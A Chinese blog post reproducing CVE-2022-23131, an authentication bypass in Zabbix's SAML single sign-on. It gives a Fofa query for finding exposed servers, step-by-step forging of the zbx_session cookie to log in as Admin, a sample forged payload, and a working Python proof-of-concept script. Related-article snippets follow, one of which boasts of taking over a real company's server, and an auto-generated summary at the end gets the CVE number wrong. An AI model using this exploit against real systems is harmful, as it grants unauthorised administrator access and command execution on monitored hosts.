Zabbix登录绕过漏洞复现(CVE-2022-23131)

最新推荐文章于 2023-03-09 11:33:16 发布
最新推荐文章于 2023-03-09 11:33:16 发布
阅读量5.9k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrHatSec/article/details/123997989
版权

Zabbix登录绕过漏洞复现(CVE-2022-23131)

漏洞描述

安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。

在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Server和Zabbix Agent实例上执行任意命令。

影响版本

Zabbix Web 前端版本包括

  • 5.4.8
  • 5.0.18
  • 4.0.36
  • 6.0.0alpha1

漏洞复现

Fofa 语法 app="ZABBIX-监控系统" && body="saml"
在这里插入图片描述
点击 Sign in 下面的 Sign in with Single Sign-On (SAML)

使用 Burp 抓包
在这里插入图片描述
复制 zbx_session 的值,使用 base64 解密一下
在这里插入图片描述
解密出来的数据和 {"saml_data":{"username_attribute":"Admin"} 结合一下

{"saml_data":{"username_attribute":"Admin"},"sessionid":"34deaa6a30e4208c183b335881a90a31","sign":"1YVxmgvUSc88AlgUPD3lsAmd1hAZoy+rRxNktEwqjxxT0NywAeDBjARJugpYGuVqPU8CfGtwkNgknfUstaK5\/Q=="}

然后使用 base64 加密一下

eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiMzRkZWFhNmEzMGU0MjA4YzE4M2IzMzU4ODFhOTBhMzEiLCJzaWduIjoiMVlWeG1ndlVTYzg4QWxnVVBEM2xzQW1kMWhBWm95K3JSeE5rdEV3cWp4eFQwTnl3QWVEQmpBUkp1Z3BZR3VWcVBVOENmR3R3a05na25mVXN0YUs1XC9RPT0ifQ==

然后替换 zbx_session 的值

在这里插入图片描述

Python 脚本

Python 脚本代码

# coding

import sys
import requests
import re,base64,urllib.parse,json
# 禁用警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def runPoc(url):
    response = requests.get(url,verify=False)

    cookie = response.headers.get("Set-Cookie")

    sessionReg = re.compile("zbx_session=(.*?);")
    try:
        session = re.findall(sessionReg,cookie)[0]

        base64_decode = base64.b64decode(urllib.parse.unquote(session,encoding="utf-8"))
        session_json = json.loads(base64_decode)

        payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}'%(session_json["sessionid"],session_json["sign"])

        print("未加密Payload:" + payload)
        print('\n')
        payload_encode = urllib.parse.quote(base64.b64encode(payload.encode()))

        print("加密后Payload:" + payload_encode)

    except IndexError:
        print("[-] 不存在漏洞")

if __name__ == '__main__':
    try:
        url = sys.argv[1]
        runPoc(url)
    except IndexError:
        print("""
    Use: python CVE-2022-23131.py http://xxxxxxxxx.com
            
            By:MrHatSec""")

python3 CVE-2022-23131.py url
在这里插入图片描述
将生成的加密后的 Payload 替换到当前目标的 Cookie中,即可直接进入管理界面
在这里插入图片描述

MrHatSec
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-23131 Zabbix登录绕过漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-27 639
简介 如果会话中存在名为saml_data的条目,则提取其值并根据 username_attribute的值在 Zabbix 上对用户进行身份验证,与 SAML 身份验证机制相关的代码可以在index_sso.php中找到。 index_sso.php if (CSessionHelper::has('saml_data')) { $saml_data = CSessionHelper::get('saml_data'); CWebUser::$data = API::g...
Zabbix登录绕过漏洞复现CVE-2022-23131
渗透测试研究中心
03-03 3123
0x00 前言最近在复现zabbix漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意......
CVE-2022-23131 zabbix登录绕过漏洞
weixin_51339377的博客
04-09 4239
zabbix (可以实现网络 架构等服务的监控 基于C语言开发 通过web界面进行管理 php制作 lamp的环境) 高可用性 HA high available 最长业务中断时间 (1-90%)x365 (1-99%)x365 (1-99.9%)x365 .... 6个9的情况 也就是(1-99.9999%)x365 说明软件系统是具备优秀的高可用性 具体zabbix的部署方式可以见Linux运维处进行部署 zabbix部署完成登录后界面 利用...
Zabbix-CVE-2022-23131复现
weixin_45794666的博客
02-24 1950
Zabbix-CVE-2022-23131 0x01漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 攻击条件限制: 需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默
漏洞复现CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞
做自己喜欢的事,并将其发挥到极致!
02-25 5065
文章目录声明前言一、漏洞概述二、影响版本三、漏洞分析会话机制分析漏洞代码分析四、漏洞复现五、参考链接 声明 本篇文章仅用于技术学习和安全研究,切勿用于非授权下的测试行为,出现任何后果与本文章作者无关!!! 前言 Zabbix是全球流行的企业级开源监控解决方案。最近Zabbix官网爆出一则漏洞CVE-2022-23131 一、漏洞概述 Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
zabbix_agent-5.0.1-windows-amd64-openssl.msi
08-30
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 ...
zabbix_agrent-5.0.28-linux-3.0
09-21
zabbix_agrent-5.0.28-linux-3.0
Zabbix SAML SSO 登录绕过漏洞CVE-2022-23131
江左盟的博客
02-25 1万+
产品简介 Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AI
(CVE-2022-23131)Zabbix登录绕过漏洞复现
qq_17754023的博客
08-12 1955
Zabbix登录绕过漏洞复现(CVE-2022-23131)漏洞描述安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。...
CVE-2022-23131——绕过 SAML SSO 身份验证
热门推荐
LiBai'S BLOG
02-19 7万+
漏洞描述 安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现,它允许身份提供者(IdP,一个能够对用户进行身份验证的实体)告诉服务提供者(SP,这里是 Zabbix)你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证,但默认情况下不启用它,因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。 在启用 SAML SSO 身份验证的实例上,它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Ser
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9607
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利
Zabbix注入漏洞复现
qq_43590351的博客
08-31 1451
CVE-2016-10134
实战CVE-2022-23131漏洞 | 身份认证绕过
qq_41132792的博客
07-27 1006
Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标...
zabbix SAML SSO 登录绕过漏洞CVE-2022-23131
xiaobai_20190815的博客
03-09 257
CVE-2022-23131
Zabbix漏洞总结
3569
01-24 5880
http://vinc.top/2017/04/18/zabbix%e6%bc%8f%e6%b4%9e%e6%80%bb%e7%bb%93/ 影响版本 1.8.5-1.8.9 利用前提 需要登录,默认口令 admin/zabbix或者是guest/空 使用Guest账户登录 报错注入 httpmon.php?applications=2 and (select 1 fro
CVE-2022-21371
最新发布
07-29
CVE-2022-21371是一个漏洞编号,根据提供的引用内容,这个漏洞涉及到一个SAML单点登录(SSO)功能的安全问题。通过利用一个POC(Proof of Concept)脚本,攻击者可以获取到一个session,并将其替换为cookie,从而实现未授权访问。\[3\]具体的攻击过程是,通过解码和解析一段JSON格式的数据,构造出一个payload,然后将其进行base64编码和URL编码,最后替换cookie中的session值。\[1\]\[2\]这个漏洞的具体细节和修复方法可以在提供的GitHub链接中找到。 #### 引用[.reference_title] - *1* *2* *3* [Zabbix-CVE-2022-23131复现](https://blog.csdn.net/weixin_45794666/article/details/123106641)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值